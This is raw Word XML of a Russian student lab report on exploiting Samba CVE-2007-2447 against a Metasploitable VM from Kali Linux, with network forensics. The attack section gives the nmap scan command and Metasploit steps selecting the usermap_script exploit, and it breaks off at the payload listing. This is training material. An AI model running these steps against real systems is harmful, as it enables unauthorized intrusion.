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CAB" w:rsidRPr="00D6375C" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB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Студент: Ганиев Р.А.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="00D6375C" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB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Группа: 11-902</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="00D6375C" w:rsidRDefault="000C0CAB" w:rsidP="000C0CA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Тема: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>спользование уязвимости прот</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">окола </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Samba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: CVE - 2007 – 2447: сетевая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ф</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>орензика</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB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0C0CAB" w:rsidRPr="00271C7C" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB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>Содержание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0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Развернуть виртуальные машины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0C0CAB" w:rsidRPr="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0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Убедиться в корректной настройке сети между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</w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0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Атака на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0C0CAB" w:rsidRPr="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0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0C0CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Форензика</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0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>Оформление результатов работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="00271C7C" w:rsidRDefault="000C0CAB" w:rsidP="000C0CAB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 xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Развернуть виртуальные машины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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0C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0C0CAB" w:rsidRPr="003950B7" w:rsidRDefault="000C0CAB" w:rsidP="000C0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развёртывание виртуальных</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> машины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0C0CAB" w:rsidRPr="003950B7" w:rsidRDefault="000C0CAB" w:rsidP="000C0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 xml:space="preserve">выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>развёртывание виртуальных машин</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRPr="003950B7" w:rsidRDefault="000C0CAB" w:rsidP="000C0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WMWare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Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0C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0C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0C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развёртывание виртуальных машин не выполнено</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0C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0C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0C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0C0CAB" w:rsidRPr="00832F02" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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выполнить развёртывание виртуальных машин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>, подготовленных</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в рамках выполнения лабораторных работ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0CAB" w:rsidRDefault="000C0CAB" w:rsidP="000C0CA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CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D42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выполнено развёртывание виртуальных машин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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="00CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Убедиться в корректной настройке сети между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Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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CD5D42" w:rsidRPr="003950B7" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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проверка корректной настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сети между </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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</w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="003950B7" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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у</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">бедиться в корректной настройке сети между </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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</w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="003950B7" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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корректность настройки сети не проверена</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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CD5D42" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D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CD5D42" w:rsidRPr="000E0EC6" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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D5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>последовательное определение IP адресов машин, выданный DHCP-</w:t>
      </w:r>
      <w:r w:rsidRPr="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">сервером, для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Kali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и для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inet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>”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="000E0EC6" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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lastRenderedPageBreak/>
        <w:t>запись полученных IP-адресов как MS_IP и KL_IP (IP-адреса должны быть из одной подсети)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="000E0EC6" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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t xml:space="preserve">проверка корректности соединения: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ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="000E0EC6" w:rsidRDefault="00CD5D42" w:rsidP="00CD5D4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t>результаты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRPr="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="00CD5D42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object w:dxaOrig="8496" w:dyaOrig="42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6pt;height:203.4pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1715648184" r:id="rId6"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRPr="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="00CD5D42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object w:dxaOrig="7464" w:dyaOrig="3900">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:373.2pt;height:195pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1715648185" r:id="rId8"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRPr="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="000E0E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object w:dxaOrig="6996" w:dyaOrig="2532">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:349.8pt;height:126.6pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1715648186" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRPr="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="000E0E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сеть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CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>между</w:t>
      </w:r>
      <w:r w:rsidRPr="000E0E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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>и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0E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali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0E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> настроена корректно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="000E0EC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRPr="000E0EC6" w:rsidRDefault="000E0EC6" w:rsidP="000E0EC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E0EC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62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4E62C6" w:rsidRPr="003950B7" w:rsidRDefault="004E62C6" w:rsidP="004E62C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атака на</w:t>
      </w:r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4E62C6" w:rsidRPr="003950B7" w:rsidRDefault="004E62C6" w:rsidP="004E62C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 w:rsidR="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">произвести атаку на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F56C29"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4E62C6" w:rsidRPr="003950B7" w:rsidRDefault="004E62C6" w:rsidP="00F56C2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средства</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56C29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="00F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>samba</w:t>
      </w:r>
      <w:r w:rsidR="00F56C29" w:rsidRPr="00F56C2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F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use, set, </w:t>
      </w:r>
      <w:r w:rsidR="00F56C29" w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62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Начальная ситуация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRDefault="00F56C29" w:rsidP="004E62C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уязвимость</w:t>
      </w:r>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE - 2007 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2447</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с целью атаки не использована</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62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4E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62C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4E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62C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сканирование портов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable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на виртуальной машине </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux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(атакующая машина) </w:t>
      </w:r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сканирование виртуальной машины </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable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(машина-жертва): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap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-p 1-65535 -T4 -A -v MS_IP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tee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4E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/scan.txt</w:t>
      </w:r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>сохранение результата сканирования в файл /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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определение порта (портов), которые используются пакетом </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>samba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, и их статус, выполнив анализ файла, подготовленного на предыдущем шаге, с помощью команды </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6" w:rsidP="004E62C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активация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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для использования уязвимости CVE - 2007 - 2447</w:t>
      </w:r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запуск консоли </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole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в терминале атакующей машины</w:t>
      </w:r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вывод списка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоитов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по использованию уязвимостей пакета </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>samba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, имеющихся во </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>фреймворке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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>metasploit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E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>samba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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запуск </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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, позволяющего использовать уязвимость CVE - 2007 – 2447: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>use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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit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multi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samba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usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsid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вывод списка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload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, доступных для данного </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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E62C6">
        <w:rPr>
